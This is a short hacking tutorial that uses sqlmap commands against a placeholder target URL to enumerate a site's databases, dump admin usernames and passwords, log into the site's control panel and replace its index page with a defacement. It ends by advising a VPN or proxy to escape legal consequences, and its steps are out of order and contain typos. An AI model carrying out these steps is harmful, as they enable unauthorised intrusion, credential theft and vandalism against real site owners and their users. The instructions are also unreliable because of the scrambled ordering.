SQLMap -Deface A Website! -tutorial
- Type “sqlmap –m or man” in the terminal and go thoroughly through manual to understand the basic of what ‘s going on behind the scenes of sqlmap.
- Then take deep look at all of them, if some database sets off an alarm to have security credentials then open it up. Or if not, then search randomly for usernames and passwords.
- If the target url will be vulnerable, you will get a list of databases present in the url.
- Sqlmap will start al automated tests for backend-dbms and loop holes available in the database. Continue to the redirects (If get any).
- Then, type sqlmap –u www.target-url.com/page.php?id=2 –dbs
- It will return with a text file dumped in your SQL directory, usually told by sqlmap.
- Type, sqlmap –u www.target-url.com/apge.php?id=2 –D Login Credentials –T Admin –C Admin_username, Admin_password, Admin_url –dump
- Next, We will dump these columns to our PC.
- Sqlmap will openup columns in the database, as an example we get, “Admin_username, Admin_password and Admin_url.
- Type, sqlmap –u www.target-url.com/page.php?id=2 –D Login Credentials –T Admin –columns
- Then, sqlmap will open up the tables in that database, Table contains columns, find appropriate one for you, for example you find “Admin”,
- Now type in, sqlmap –u www.target-url.com/page.php?id=2 –D Login Credentials –tables
- Now, for example, you find a database named “Login Credentials”.
- Now, A file named with your url will be created, open it up and there you will username, password and url to login.
- For example url to login is www.target-url.com/wp-admin
- Enter username and password there. You will be greeted to c-Panel, You can easily create your defacement page using HTML and CSS. Upload it to Public files folder, But remember to change name to Index.php or Index.html. Because Index is the first page which shows up when url is opened.
Important: Make sure to use VPN or Proxy To hide your IP Address Or Else, You Will Be In Serious Trouble By LAW!!
